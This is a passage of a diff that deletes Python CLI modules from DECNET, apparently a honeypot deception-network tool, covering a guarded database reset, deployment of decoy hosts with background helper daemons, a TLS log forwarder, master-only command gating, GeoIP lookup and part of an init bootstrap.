                "[yellow]Dry-run only. Re-run with [bold]--i-know-what-im-doing[/] "
                "to actually execute.[/]"
            )
            return

        # Pass 2: wipe. FK checks are turned off for the duration so the
        # statements succeed regardless of table order.
        async with engine.begin() as conn:
            await conn.execute(text("SET FOREIGN_KEY_CHECKS = 0"))
            for name in table_names:
                if counts.get(name, -1) >= 0:
                    await conn.execute(text(f"{statement} `{name}`"))
                    console.print(f"[green]✓ {label} {name}[/]")
            await conn.execute(text("SET FOREIGN_KEY_CHECKS = 1"))

        console.print(f"[bold green]Done. Database `{db_name}` reset ({mode}).[/]")
    finally:
        # Release the engine on every exit path, including the dry-run return.
        await engine.dispose()
|
||||
|
||||
|
||||
def register(app: typer.Typer) -> None:
    # Attaches the `db-reset` command to the given Typer app.
    @app.command(name="db-reset")
    def db_reset(
        i_know: bool = typer.Option(
            False, "--i-know-what-im-doing",
            help="Required to actually execute. Without it, the command runs in dry-run mode.",
        ),
        mode: str = typer.Option(
            "truncate", "--mode",
            help="truncate (wipe rows, keep schema) | drop-tables (DROP TABLE for each DECNET table)",
        ),
        url: Optional[str] = typer.Option(
            None, "--url",
            help="Override DECNET_DB_URL for this invocation (e.g. when cleanup needs admin creds).",
        ),
    ) -> None:
        """Wipe the MySQL database used by the DECNET dashboard.

        Destructive. Runs dry by default — pass --i-know-what-im-doing to commit.
        Only supported against MySQL; refuses to operate on SQLite.
        """
        import asyncio
        import os

        # Usage errors exit with status 2; a failed reset exits with 1.
        if mode not in {"truncate", "drop-tables"}:
            console.print(f"[red]Invalid --mode '{mode}'. Expected: truncate | drop-tables.[/]")
            raise typer.Exit(2)

        backend = os.environ.get("DECNET_DB_TYPE", "sqlite").lower()
        if backend != "mysql":
            console.print(
                f"[red]db-reset is MySQL-only (DECNET_DB_TYPE='{backend}'). "
                f"For SQLite, just delete the decnet.db file.[/]"
            )
            raise typer.Exit(2)

        # DSN precedence: --url, then DECNET_DB_URL, then a URL built by
        # build_mysql_url().
        dsn = url or os.environ.get("DECNET_DB_URL")
        if not dsn:
            from decnet.web.db.mysql.database import build_mysql_url

            try:
                dsn = build_mysql_url()
            except ValueError as err:
                console.print(f"[red]{err}[/]")
                raise typer.Exit(2) from err

        log.info("db-reset invoked mode=%s confirm=%s", mode, i_know)
        reset_job = _db_reset_mysql_async(dsn, mode=mode, confirm=i_know)
        try:
            asyncio.run(reset_job)
        except Exception as err:  # noqa: BLE001
            console.print(f"[red]db-reset failed: {err}[/]")
            raise typer.Exit(1) from err
|
||||
@@ -1,307 +0,0 @@
|
||||
from __future__ import annotations
|
||||
|
||||
from typing import Optional
|
||||
|
||||
import typer
|
||||
from rich.table import Table
|
||||
|
||||
from decnet.archetypes import Archetype, get_archetype
|
||||
from decnet.config import DecnetConfig
|
||||
from decnet.distros import get_distro
|
||||
from decnet.env import DECNET_API_HOST, DECNET_INGEST_LOG_FILE
|
||||
from decnet.fleet import all_service_names, build_deckies, build_deckies_from_ini
|
||||
from decnet.ini_loader import load_ini
|
||||
from decnet.network import detect_interface, detect_subnet, allocate_ips, get_host_ip
|
||||
|
||||
from . import utils as _utils
|
||||
from .gating import _require_master_mode
|
||||
from .utils import console, log
|
||||
|
||||
|
||||
def _deploy_swarm(config: "DecnetConfig", *, dry_run: bool, no_cache: bool) -> None:
    """Shard deckies round-robin across workers and POST the plan to swarmctl.

    Hosts are fetched for the ``enrolled`` and ``active`` statuses, in that
    order. Each decky is then stamped with the ``uuid`` of the host chosen
    by its index modulo the host count. One result row is printed per entry
    in the response's ``results`` list.

    Raises:
        typer.Exit: With code 1 when no host is available, or when any
            returned result has a falsy ``ok`` field.
    """
    base = _utils._swarmctl_base_url(None)

    # Collect candidate hosts: enrolled first, then active.
    workers: list = []
    for host_status in ("enrolled", "active"):
        reply = _utils._http_request("GET", base + "/swarm/hosts?host_status=" + host_status)
        workers.extend(reply.json())

    if not workers:
        console.print("[red]No enrolled workers — run `decnet swarm enroll ...` first.[/]")
        raise typer.Exit(1)

    # Round-robin: decky i goes to worker i mod len(workers).
    assigned: list = [
        decky.model_copy(update={"host_uuid": workers[idx % len(workers)]["uuid"]})
        for idx, decky in enumerate(config.deckies)
    ]
    config = config.model_copy(update={"deckies": assigned})

    body = {
        "config": config.model_dump(mode="json"),
        "dry_run": dry_run,
        "no_cache": no_cache,
    }
    console.print(f"[cyan]Dispatching {len(config.deckies)} deckies across {len(workers)} worker(s)...[/]")
    deploy_reply = _utils._http_request("POST", base + "/swarm/deploy", json_body=body, timeout=900.0)
    results = deploy_reply.json().get("results", [])

    table = Table(title="SWARM deploy results")
    for heading in ("worker", "host_uuid", "ok", "detail"):
        table.add_column(heading)

    any_failed = False
    for entry in results:
        ok = bool(entry.get("ok"))
        any_failed = any_failed or not ok

        detail = entry.get("detail")
        if isinstance(detail, dict):
            # A dict detail is reduced to its "status" value, or "ok" when
            # that is missing or empty.
            detail = detail.get("status") or "ok"

        table.add_row(
            str(entry.get("host_name") or ""),
            str(entry.get("host_uuid") or ""),
            "[green]yes[/]" if ok else "[red]no[/]",
            str(detail)[:80],  # truncated to keep the column narrow
        )

    console.print(table)
    if any_failed:
        raise typer.Exit(1)
|
||||
|
||||
|
||||
def register(app: typer.Typer) -> None:
    """Attach the master-only ``deploy`` command to *app*.

    The command builds a ``DecnetConfig`` either from an INI file
    (``--config``) or from CLI flags, deploys it (locally, or through
    swarmctl when ``--mode swarm``), and then spawns the background helper
    processes (mutator watcher, log collector, API, prober, profiler,
    sniffer) as detached children.
    """

    @app.command()
    def deploy(
        mode: str = typer.Option("unihost", "--mode", "-m", help="Deployment mode: unihost | swarm"),
        deckies: Optional[int] = typer.Option(None, "--deckies", "-n", help="Number of deckies to deploy (required without --config)", min=1),
        interface: Optional[str] = typer.Option(None, "--interface", "-i", help="Host NIC (auto-detected if omitted)"),
        subnet: Optional[str] = typer.Option(None, "--subnet", help="LAN subnet CIDR (auto-detected if omitted)"),
        ip_start: Optional[str] = typer.Option(None, "--ip-start", help="First decky IP (auto if omitted)"),
        services: Optional[str] = typer.Option(None, "--services", help="Comma-separated services, e.g. ssh,smb,rdp"),
        randomize_services: bool = typer.Option(False, "--randomize-services", help="Assign random services to each decky"),
        distro: Optional[str] = typer.Option(None, "--distro", help="Comma-separated distro slugs, e.g. debian,ubuntu22,rocky9"),
        randomize_distros: bool = typer.Option(False, "--randomize-distros", help="Assign a random distro to each decky"),
        log_file: Optional[str] = typer.Option(DECNET_INGEST_LOG_FILE, "--log-file", help="Host path for the collector to write RFC 5424 logs (e.g. /var/log/decnet/decnet.log)"),
        archetype_name: Optional[str] = typer.Option(None, "--archetype", "-a", help="Machine archetype slug (e.g. linux-server, windows-workstation)"),
        mutate_interval: Optional[int] = typer.Option(30, "--mutate-interval", help="Automatically rotate services every N minutes"),
        dry_run: bool = typer.Option(False, "--dry-run", help="Generate compose file without starting containers"),
        no_cache: bool = typer.Option(False, "--no-cache", help="Force rebuild all images, ignoring Docker layer cache"),
        parallel: bool = typer.Option(False, "--parallel", help="Build all images concurrently (enables BuildKit, separates build from up)"),
        ipvlan: bool = typer.Option(False, "--ipvlan", help="Use IPvlan L2 instead of MACVLAN (required on WiFi interfaces)"),
        config_file: Optional[str] = typer.Option(None, "--config", "-c", help="Path to INI config file"),
        api: bool = typer.Option(False, "--api", help="Start the FastAPI backend to ingest and serve logs"),
        api_port: int = typer.Option(8000, "--api-port", help="Port for the backend API"),
        daemon: bool = typer.Option(False, "--daemon", help="Detach to background as a daemon process"),
    ) -> None:
        """Deploy deckies to the LAN."""
        import os
        import subprocess  # nosec B404
        import sys
        from pathlib import Path as _Path

        _require_master_mode("deploy")
        if daemon:
            log.info("deploy daemonizing mode=%s deckies=%s", mode, deckies)
            _utils._daemonize()

        log.info("deploy command invoked mode=%s deckies=%s dry_run=%s", mode, deckies, dry_run)
        if mode not in ("unihost", "swarm"):
            console.print("[red]--mode must be 'unihost' or 'swarm'[/]")
            raise typer.Exit(1)

        if config_file:
            # --- INI-driven deployment: CLI flags override INI values. ---
            try:
                ini = load_ini(config_file)
            except FileNotFoundError as e:
                console.print(f"[red]{e}[/]")
                raise typer.Exit(1)

            iface = interface or ini.interface or detect_interface()
            subnet_cidr = subnet or ini.subnet
            effective_gateway = ini.gateway
            if subnet_cidr is None:
                subnet_cidr, effective_gateway = detect_subnet(iface)
            elif effective_gateway is None:
                # Subnet was given explicitly; only the gateway is auto-detected.
                _, effective_gateway = detect_subnet(iface)

            host_ip = get_host_ip(iface)
            console.print(f"[dim]Config:[/] {config_file} [dim]Interface:[/] {iface} "
                          f"[dim]Subnet:[/] {subnet_cidr} [dim]Gateway:[/] {effective_gateway} "
                          f"[dim]Host IP:[/] {host_ip}")

            if ini.custom_services:
                from decnet.custom_service import CustomService
                from decnet.services.registry import register_custom_service
                for cs in ini.custom_services:
                    register_custom_service(
                        CustomService(
                            name=cs.name,
                            image=cs.image,
                            exec_cmd=cs.exec_cmd,
                            ports=cs.ports,
                        )
                    )

            try:
                decky_configs = build_deckies_from_ini(
                    ini, subnet_cidr, effective_gateway, host_ip, randomize_services, cli_mutate_interval=mutate_interval
                )
            except ValueError as e:
                console.print(f"[red]{e}[/]")
                raise typer.Exit(1)
        else:
            # --- Flag-driven deployment. ---
            if deckies is None:
                console.print("[red]--deckies is required when --config is not used.[/]")
                raise typer.Exit(1)

            services_list = [s.strip() for s in services.split(",")] if services else None
            if services_list:
                known = set(all_service_names())
                unknown = [s for s in services_list if s not in known]
                if unknown:
                    console.print(f"[red]Unknown service(s): {unknown}. Available: {all_service_names()}[/]")
                    raise typer.Exit(1)

            arch: Archetype | None = None
            if archetype_name:
                try:
                    arch = get_archetype(archetype_name)
                except ValueError as e:
                    console.print(f"[red]{e}[/]")
                    raise typer.Exit(1)

            if not services_list and not randomize_services and not arch:
                console.print("[red]Specify --services, --archetype, or --randomize-services.[/]")
                raise typer.Exit(1)

            iface = interface or detect_interface()
            if subnet is None:
                subnet_cidr, effective_gateway = detect_subnet(iface)
            else:
                subnet_cidr = subnet
                _, effective_gateway = detect_subnet(iface)

            host_ip = get_host_ip(iface)
            console.print(f"[dim]Interface:[/] {iface} [dim]Subnet:[/] {subnet_cidr} "
                          f"[dim]Gateway:[/] {effective_gateway} [dim]Host IP:[/] {host_ip}")

            distros_list = [d.strip() for d in distro.split(",")] if distro else None
            if distros_list:
                # Validate every slug up front; get_distro raises on unknown ones.
                try:
                    for slug in distros_list:
                        get_distro(slug)
                except ValueError as e:
                    console.print(f"[red]{e}[/]")
                    raise typer.Exit(1)

            ips = allocate_ips(subnet_cidr, effective_gateway, host_ip, deckies, ip_start)
            decky_configs = build_deckies(
                deckies, ips, services_list, randomize_services,
                distros_explicit=distros_list, randomize_distros=randomize_distros,
                archetype=arch, mutate_interval=mutate_interval,
            )

        # Both paths use the CLI/env log file; --api supplies a fallback below.
        effective_log_file = log_file
        if api and not effective_log_file:
            effective_log_file = os.path.join(os.getcwd(), "decnet.log")
            console.print(f"[cyan]API mode enabled: defaulting log-file to {effective_log_file}[/]")

        config = DecnetConfig(
            mode=mode,
            interface=iface,
            subnet=subnet_cidr,
            gateway=effective_gateway,
            deckies=decky_configs,
            log_file=effective_log_file,
            ipvlan=ipvlan,
            mutate_interval=mutate_interval,
        )

        log.debug("deploy: config built deckies=%d interface=%s subnet=%s", len(config.deckies), config.interface, config.subnet)

        if mode == "swarm":
            # Swarm mode hands everything to swarmctl; no local helpers are spawned.
            _deploy_swarm(config, dry_run=dry_run, no_cache=no_cache)
            if dry_run:
                log.info("deploy: swarm dry-run complete, no workers dispatched")
            else:
                log.info("deploy: swarm deployment complete deckies=%d", len(config.deckies))
            return

        from decnet.engine import deploy as _deploy
        _deploy(config, dry_run=dry_run, no_cache=no_cache, parallel=parallel)
        if dry_run:
            log.info("deploy: dry-run complete, no containers started")
        else:
            log.info("deploy: deployment complete deckies=%d", len(config.deckies))

        if mutate_interval is not None and not dry_run:
            console.print(f"[green]Starting DECNET Mutator watcher in the background (interval: {mutate_interval}m)...[/]")
            try:
                subprocess.Popen(  # nosec B603
                    [sys.executable, "-m", "decnet.cli", "mutate", "--watch"],
                    stdout=subprocess.DEVNULL,
                    stderr=subprocess.STDOUT,
                    start_new_session=True,
                )
            except (FileNotFoundError, subprocess.SubprocessError):
                console.print("[red]Failed to start mutator watcher.[/]")

        if effective_log_file and not dry_run and not api:
            _collector_err = _Path(effective_log_file).with_suffix(".collector.log")
            console.print(f"[bold cyan]Starting log collector[/] → {effective_log_file}")
            try:
                # The child gets its own copy of the descriptor, so the
                # parent's handle is closed as soon as Popen returns instead
                # of leaking for the rest of the process lifetime.
                with open(_collector_err, "a") as _collector_log:
                    subprocess.Popen(  # nosec B603
                        [sys.executable, "-m", "decnet.cli", "collect", "--log-file", str(effective_log_file)],
                        stdin=subprocess.DEVNULL,
                        stdout=_collector_log,
                        stderr=subprocess.STDOUT,
                        start_new_session=True,
                    )
            except (OSError, subprocess.SubprocessError) as exc:
                # Same best-effort policy as the other helpers: the deckies
                # are already up, so report and carry on.
                console.print(f"[red]Failed to start log collector: {exc}[/]")

        if api and not dry_run:
            console.print(f"[green]Starting DECNET API on port {api_port}...[/]")
            _env: dict[str, str] = os.environ.copy()
            _env["DECNET_INGEST_LOG_FILE"] = str(effective_log_file or "")
            try:
                subprocess.Popen(  # nosec B603
                    [sys.executable, "-m", "uvicorn", "decnet.web.api:app", "--host", DECNET_API_HOST, "--port", str(api_port)],
                    env=_env,
                    stdout=subprocess.DEVNULL,
                    stderr=subprocess.STDOUT
                )
                console.print(f"[dim]API running at http://{DECNET_API_HOST}:{api_port}[/]")
            except (FileNotFoundError, subprocess.SubprocessError):
                console.print("[red]Failed to start API. Ensure 'uvicorn' is installed in the current environment.[/]")

        if effective_log_file and not dry_run:
            console.print("[bold cyan]Starting DECNET-PROBER[/] (auto-discovers attackers from log stream)")
            try:
                subprocess.Popen(  # nosec B603
                    [sys.executable, "-m", "decnet.cli", "probe", "--daemon", "--log-file", str(effective_log_file)],
                    stdin=subprocess.DEVNULL,
                    stdout=subprocess.DEVNULL,
                    stderr=subprocess.STDOUT,
                    start_new_session=True,
                )
            except (FileNotFoundError, subprocess.SubprocessError):
                console.print("[red]Failed to start DECNET-PROBER.[/]")

        if effective_log_file and not dry_run:
            console.print("[bold cyan]Starting DECNET-PROFILER[/] (builds attacker profiles from log stream)")
            try:
                subprocess.Popen(  # nosec B603
                    [sys.executable, "-m", "decnet.cli", "profiler", "--daemon"],
                    stdin=subprocess.DEVNULL,
                    stdout=subprocess.DEVNULL,
                    stderr=subprocess.STDOUT,
                    start_new_session=True,
                )
            except (FileNotFoundError, subprocess.SubprocessError):
                console.print("[red]Failed to start DECNET-PROFILER.[/]")

        if effective_log_file and not dry_run:
            console.print("[bold cyan]Starting DECNET-SNIFFER[/] (passive network capture)")
            try:
                subprocess.Popen(  # nosec B603
                    [sys.executable, "-m", "decnet.cli", "sniffer", "--daemon", "--log-file", str(effective_log_file)],
                    stdin=subprocess.DEVNULL,
                    stdout=subprocess.DEVNULL,
                    stderr=subprocess.STDOUT,
                    start_new_session=True,
                )
            except (FileNotFoundError, subprocess.SubprocessError):
                console.print("[red]Failed to start DECNET-SNIFFER.[/]")
|
||||
@@ -1,74 +0,0 @@
|
||||
from __future__ import annotations
|
||||
|
||||
import asyncio
|
||||
import pathlib
|
||||
import signal
|
||||
from typing import Optional
|
||||
|
||||
import typer
|
||||
|
||||
from decnet.env import DECNET_INGEST_LOG_FILE
|
||||
|
||||
from . import utils as _utils
|
||||
from .utils import console, log
|
||||
|
||||
|
||||
def register(app: typer.Typer) -> None:
    """Attach the worker-side ``forwarder`` command to *app*."""

    @app.command()
    def forwarder(
        master_host: Optional[str] = typer.Option(None, "--master-host", help="Master listener hostname/IP (default: $DECNET_SWARM_MASTER_HOST)"),
        master_port: int = typer.Option(6514, "--master-port", help="Master listener TCP port (RFC 5425 default 6514)"),
        log_file: Optional[str] = typer.Option(DECNET_INGEST_LOG_FILE, "--log-file", help="Local RFC 5424 file to tail and forward"),
        agent_dir: Optional[str] = typer.Option(None, "--agent-dir", help="Worker cert bundle dir (default: ~/.decnet/agent)"),
        state_db: Optional[str] = typer.Option(None, "--state-db", help="Forwarder offset SQLite path (default: <agent_dir>/forwarder.db)"),
        poll_interval: float = typer.Option(0.5, "--poll-interval", help="Seconds between log file stat checks"),
        daemon: bool = typer.Option(False, "--daemon", "-d", help="Detach to background as a daemon process"),
    ) -> None:
        """Run the worker-side syslog-over-TLS forwarder (RFC 5425, mTLS to master:6514)."""
        from decnet.env import DECNET_SWARM_MASTER_HOST
        from decnet.swarm import pki
        from decnet.swarm.log_forwarder import ForwarderConfig, run_forwarder

        # Validation order: master host, then cert bundle, then log file.
        target_host = master_host or DECNET_SWARM_MASTER_HOST
        if not target_host:
            console.print("[red]--master-host is required (or set DECNET_SWARM_MASTER_HOST).[/]")
            raise typer.Exit(2)

        if agent_dir:
            bundle_dir = pathlib.Path(agent_dir)
        else:
            bundle_dir = pki.DEFAULT_AGENT_DIR
        if not (bundle_dir / "worker.crt").exists():
            console.print(f"[red]No worker cert bundle at {bundle_dir} — enroll from the master first.[/]")
            raise typer.Exit(2)

        if not log_file:
            console.print("[red]--log-file is required.[/]")
            raise typer.Exit(2)

        offsets_db = pathlib.Path(state_db) if state_db else None
        cfg = ForwarderConfig(
            log_path=pathlib.Path(log_file),
            master_host=target_host,
            master_port=master_port,
            agent_dir=bundle_dir,
            state_db=offsets_db,
        )

        if daemon:
            log.info("forwarder daemonizing master=%s:%d log=%s", target_host, master_port, log_file)
            _utils._daemonize()

        log.info("forwarder command invoked master=%s:%d log=%s", target_host, master_port, log_file)
        console.print(f"[green]Starting DECNET forwarder → {target_host}:{master_port} (mTLS)...[/]")

        async def _main() -> None:
            # SIGTERM/SIGINT set the stop event handed to run_forwarder.
            stop = asyncio.Event()
            running_loop = asyncio.get_running_loop()
            for signum in (signal.SIGTERM, signal.SIGINT):
                try:
                    running_loop.add_signal_handler(signum, stop.set)
                except (NotImplementedError, RuntimeError):  # pragma: no cover
                    # Handler could not be installed; carry on without it.
                    pass
            await run_forwarder(cfg, poll_interval=poll_interval, stop_event=stop)

        try:
            asyncio.run(_main())
        except KeyboardInterrupt:
            # Ctrl-C is treated as a normal shutdown, not an error.
            pass
|
||||
@@ -1,73 +0,0 @@
|
||||
"""Role-based CLI gating.
|
||||
|
||||
MAINTAINERS: when you add a new Typer command (or add_typer group) that is
|
||||
master-only, register its name in MASTER_ONLY_COMMANDS / MASTER_ONLY_GROUPS
|
||||
below. The gate is the only thing that:
|
||||
(a) hides the command from `decnet --help` on worker hosts, and
|
||||
(b) prevents a misconfigured worker from invoking master-side logic.
|
||||
Forgetting to register a new command is a role-boundary bug. Grep for
|
||||
MASTER_ONLY when touching command registration.
|
||||
|
||||
Worker-legitimate commands (NOT in these sets): agent, updater, forwarder,
|
||||
status, collect, probe, sniffer. Agents run deckies locally and should be
|
||||
able to inspect them + run the per-host microservices (collector streams
|
||||
container logs, prober characterizes attackers hitting this host, sniffer
|
||||
captures traffic). Mutator and Profiler stay master-only: the mutator
|
||||
orchestrates respawns across the swarm; the profiler rebuilds attacker
|
||||
profiles against the master DB (no per-host DB exists).
|
||||
"""
|
||||
|
||||
from __future__ import annotations
|
||||
|
||||
import os
|
||||
|
||||
import typer
|
||||
|
||||
from .utils import console
|
||||
|
||||
# Top-level commands that are filtered out (and refused) on agent hosts.
# Kept alphabetical, one per line, so additions produce minimal diffs.
MASTER_ONLY_COMMANDS: frozenset[str] = frozenset(
    {
        "api",
        "archetypes",
        "campaign-clusterer",
        "clusterer",
        "correlate",
        "db-reset",
        "deploy",
        "distros",
        "init",
        "listener",
        "mutate",
        "profiler",
        "redeploy",
        "services",
        "swarmctl",
        "teardown",
        "web",
        "webhook",
    }
)

# Sub-command groups (add_typer) that are filtered out on agent hosts.
MASTER_ONLY_GROUPS: frozenset[str] = frozenset(
    {
        "geoip",
        "realism",
        "swarm",
        "topology",
    }
)
|
||||
|
||||
|
||||
def _agent_mode_active() -> bool:
    """Report whether master-only commands must be blocked on this host.

    True only when ``DECNET_MODE`` (default ``master``) is ``agent`` and
    ``DECNET_DISALLOW_MASTER`` (default ``true``) is the string ``true``;
    both comparisons are case-insensitive.  A worker opts into hybrid use
    by setting ``DECNET_DISALLOW_MASTER=false``.
    """
    if os.environ.get("DECNET_MODE", "master").lower() != "agent":
        return False
    return os.environ.get("DECNET_DISALLOW_MASTER", "true").lower() == "true"
|
||||
|
||||
|
||||
def _require_master_mode(command_name: str) -> None:
    """Refuse to run a master-only command body on an agent host.

    Intended as the first call inside every master-only command.  It backs
    up the registration-time filtering for callers that import and invoke
    the command function directly instead of going through Typer.

    Raises:
        typer.Exit: code 1, after printing an explanation, when agent mode
            is active.
    """
    if not _agent_mode_active():
        return
    refusal = (
        f"[red]`decnet {command_name}` is a master-only command; this host "
        f"is configured as an agent (DECNET_MODE=agent).[/]"
    )
    console.print(refusal)
    raise typer.Exit(1)
|
||||
|
||||
|
||||
def _gate_commands_by_mode(_app: typer.Typer) -> None:
    """Remove master-only commands and groups from *_app* on agent hosts.

    Does nothing unless agent mode is active.  Otherwise the app's
    ``registered_commands`` and ``registered_groups`` lists are replaced
    with copies that omit every entry named in ``MASTER_ONLY_COMMANDS`` /
    ``MASTER_ONLY_GROUPS``.

    A command registered without an explicit name is matched both by its
    raw callback name and by the CLI name Typer derives from it
    (lower-cased, ``_`` replaced with ``-``), so a callback called
    ``db_reset`` is gated by the ``"db-reset"`` entry.
    """
    if not _agent_mode_active():
        return

    def _is_master_only(cmd) -> bool:
        if cmd.name:
            return cmd.name in MASTER_ONLY_COMMANDS
        # No explicit name: fall back to the callback, tolerating a missing one.
        raw = getattr(cmd.callback, "__name__", "") or ""
        cli_name = raw.lower().replace("_", "-")
        return raw in MASTER_ONLY_COMMANDS or cli_name in MASTER_ONLY_COMMANDS

    _app.registered_commands = [
        c for c in _app.registered_commands
        if not _is_master_only(c)
    ]
    _app.registered_groups = [
        g for g in _app.registered_groups
        if g.name not in MASTER_ONLY_GROUPS
    ]
|
||||
@@ -1,59 +0,0 @@
|
||||
"""GeoIP CLI — refresh and lookup subcommands (master-only).
|
||||
|
||||
Usage::
|
||||
|
||||
decnet geoip refresh # re-download RIR files and rebuild the index
|
||||
decnet geoip lookup 8.8.8.8 # one-shot IP -> country dump
|
||||
"""
|
||||
from __future__ import annotations
|
||||
|
||||
import typer
|
||||
|
||||
from .gating import _require_master_mode
|
||||
from .utils import console, log
|
||||
|
||||
# Sub-application holding the `decnet geoip ...` commands; invoking it with
# no sub-command prints the help text.
_group = typer.Typer(
    help="GeoIP provider management (master only).",
    name="geoip",
    no_args_is_help=True,
)
|
||||
|
||||
|
||||
@_group.command("refresh")
def _refresh() -> None:
    """Force re-download of the GeoIP provider data and rebuild the index."""
    _require_master_mode("geoip refresh")
    from decnet.geoip import get_lookup
    from decnet.geoip.factory import get_provider

    backend = get_provider()
    log.info("geoip: forcing refresh via %s provider", backend.name)
    console.print(f"[bold cyan]Refreshing {backend.name} GeoIP data…[/]")

    # Any failure during the rebuild is reported and turned into exit code 1.
    try:
        rebuilt = get_lookup(force_refresh=True)
    except Exception as exc:  # noqa: BLE001
        console.print(f"[red]refresh failed: {exc}[/]")
        raise typer.Exit(1) from exc

    summary = (
        f"[green]OK[/] {backend.name} index rebuilt "
        f"({len(rebuilt)} ranges)."
    )
    console.print(summary)
|
||||
|
||||
|
||||
@_group.command("lookup")
def _lookup(
    ip: str = typer.Argument(..., help="IP address to resolve."),
) -> None:
    """Print the country code for an IP (or 'unknown')."""
    _require_master_mode("geoip lookup")
    from decnet.geoip import enrich_ip

    country, origin = enrich_ip(ip)
    if country is None:
        # An unresolved address is not an error: exit code stays 0.
        console.print(f"{ip} [yellow]unknown[/]")
        raise typer.Exit(0)
    console.print(f"{ip} [green]cc={country}[/] source={origin}")
|
||||
|
||||
|
||||
def register(app: typer.Typer) -> None:
    """Mount the ``geoip`` sub-command group on *app*."""
    app.add_typer(_group, name="geoip")
|
||||
@@ -1,843 +0,0 @@
|
||||
"""
|
||||
`decnet init` — one-shot master-host bootstrap.
|
||||
|
||||
Idempotent: running it twice is a no-op on already-configured items.
|
||||
Takes a freshly ``pip install``'d DECNET and turns it into a ready-to-
|
||||
run master host: creates the ``decnet`` system user/group, installs
|
||||
the systemd units + polkit rule + tmpfiles.d entry, seeds the
|
||||
directory layout, drops a placeholder config, and starts the
|
||||
``decnet.target`` grouping unit.
|
||||
|
||||
Requires root. Uses ``subprocess.run`` (never ``shell=True``) for every
|
||||
privileged call so the full argv surface is auditable.
|
||||
"""
|
||||
from __future__ import annotations
|
||||
|
||||
import grp
|
||||
import hashlib
|
||||
import os
|
||||
import pwd
|
||||
import shutil
|
||||
import subprocess # nosec B404
|
||||
import sys
|
||||
from pathlib import Path
|
||||
from typing import Callable, List, Optional
|
||||
|
||||
import typer
|
||||
from jinja2 import Environment, FileSystemLoader, StrictUndefined
|
||||
|
||||
import decnet as _decnet_pkg
|
||||
from .gating import _require_master_mode
|
||||
from .utils import console, log
|
||||
|
||||
|
||||
_CONFIG_PLACEHOLDER = """\
|
||||
# /etc/decnet/decnet.ini — DECNET host config.
|
||||
#
|
||||
# Every key is OPTIONAL. Absent keys fall through to env-var defaults
|
||||
# defined in decnet/env.py. Real env vars always win over this file
|
||||
# (precedence: env > INI > default), so systemd EnvironmentFile= and
|
||||
# one-off `DECNET_FOO=bar decnet ...` invocations always take effect.
|
||||
#
|
||||
# Secrets (JWT, admin password, DB password) intentionally DO NOT
|
||||
# live here. Put them in /opt/decnet/.env.local or the systemd
|
||||
# EnvironmentFile= — never in a group-readable INI.
|
||||
|
||||
[decnet]
|
||||
# mode = master # or "agent"
|
||||
|
||||
# [api]
|
||||
# host = 127.0.0.1
|
||||
# port = 8000
|
||||
|
||||
# [web]
|
||||
# host = 127.0.0.1
|
||||
# port = 8080
|
||||
# admin-user = admin
|
||||
# cors-origins = http://localhost:8080 # comma-separated
|
||||
|
||||
# [database]
|
||||
# type = sqlite # or "mysql"
|
||||
# url = mysql+asyncmy://user@host:3306/decnet # if set, wins over host/port/name/user
|
||||
# host = localhost
|
||||
# port = 3306
|
||||
# name = decnet
|
||||
# user = decnet
|
||||
|
||||
# [bus]
|
||||
# enabled = true
|
||||
# type = unix # or "fake"
|
||||
# socket = /run/decnet/bus.sock
|
||||
# group = decnet
|
||||
|
||||
# [swarm]
|
||||
# master-host = 10.0.0.1
|
||||
# syslog-port = 6514
|
||||
# swarmctl-port = 8770
|
||||
|
||||
# [logging]
|
||||
# system-log = /var/log/decnet/decnet.system.log
|
||||
# ingest-log = /var/log/decnet/decnet.log
|
||||
# agent-log = /var/log/decnet/agent.log
|
||||
|
||||
# [ingester]
|
||||
# batch-size = 100
|
||||
# batch-max-wait-ms = 250
|
||||
|
||||
# [tracing]
|
||||
# enabled = false
|
||||
# otel-endpoint = http://localhost:4317
|
||||
|
||||
# [agent]
|
||||
# Managed by the enroll bundle — do NOT edit by hand on an agent host.
|
||||
"""
|
||||
|
||||
|
||||
def _deploy_root() -> Path:
    """Locate the ``deploy/`` directory that ships next to the package.

    The directory is looked up as a sibling of the ``decnet`` package
    directory, which is where an editable install from a git checkout
    puts it.  Its presence is confirmed by checking for ``decnet.target``.

    Raises:
        RuntimeError: when ``deploy/decnet.target`` is not found there.
    """
    package_dir = Path(_decnet_pkg.__file__).resolve().parent
    root = package_dir.parent / "deploy"
    if (root / "decnet.target").is_file():
        return root
    raise RuntimeError(
        f"cannot locate deploy/ directory (looked at {root}); "
        "are you on a wheel install that didn't bundle deploy/? "
        "use `pip install -e .` from a git checkout"
    )
|
||||
|
||||
|
||||
def _sha256(path: Path) -> str:
    """Return the hex SHA-256 digest of the file at *path* (read in full)."""
    return hashlib.sha256(path.read_bytes()).hexdigest()
|
||||
|
||||
|
||||
def _run(argv: List[str], *, dry_run: bool) -> None:
    """Execute *argv* as a subprocess, or only announce it under *dry_run*.

    The command is run without a shell and with ``check=True``, so a
    non-zero exit raises ``subprocess.CalledProcessError``.
    """
    if not dry_run:
        log.info("init: exec %s", argv)
        subprocess.run(argv, check=True)  # nosec B603
        return
    preview = " ".join(argv)
    console.print(f" [dim]would run:[/] {preview}")
|
||||
|
||||
|
||||
def _step(label: str, action: Callable[[], str]) -> bool:
    """Execute one bootstrap step and print its checklist line.

    *action* returns an outcome string.  A value starting with ``skip:``
    prints ``[SKIP] <label> (<reason>)``; anything else prints
    ``[ OK ] <label>``.  If *action* raises, ``[FAIL] <label>: <err>`` is
    printed and the exception propagates unchanged.

    Returns:
        Always ``True`` when *action* completes without raising.
    """
    try:
        outcome = action()
    except Exception as exc:  # noqa: BLE001
        console.print(f"[red][FAIL][/] {label}: {exc}")
        raise

    marker = "skip:"
    if not outcome.startswith(marker):
        console.print(f"[green][ OK ][/] {label}")
        return True

    reason = outcome[len(marker):].strip()
    console.print(f"[yellow][SKIP][/] {label} ({reason})")
    return True
|
||||
|
||||
|
||||
def _ensure_group(group: str, *, dry_run: bool) -> str:
    """Create system group *group* via ``groupadd --system`` if it is missing.

    Returns a ``skip: ...`` outcome when the group already exists and
    ``"ok"`` once creation has been run (or announced, under *dry_run*).
    """
    try:
        grp.getgrnam(group)
    except KeyError:
        # Lookup failed, so the group does not exist yet.
        _run(["groupadd", "--system", group], dry_run=dry_run)
        return "ok"
    return f"skip: group {group} already exists"
|
||||
|
||||
|
||||
def _ensure_user(user: str, group: str, install_dir: str, *, dry_run: bool) -> str:
    """Create system account *user* via ``useradd`` if it is missing.

    The account is created with primary group *group*, home directory
    *install_dir* and ``/usr/sbin/nologin`` as shell.  Returns a
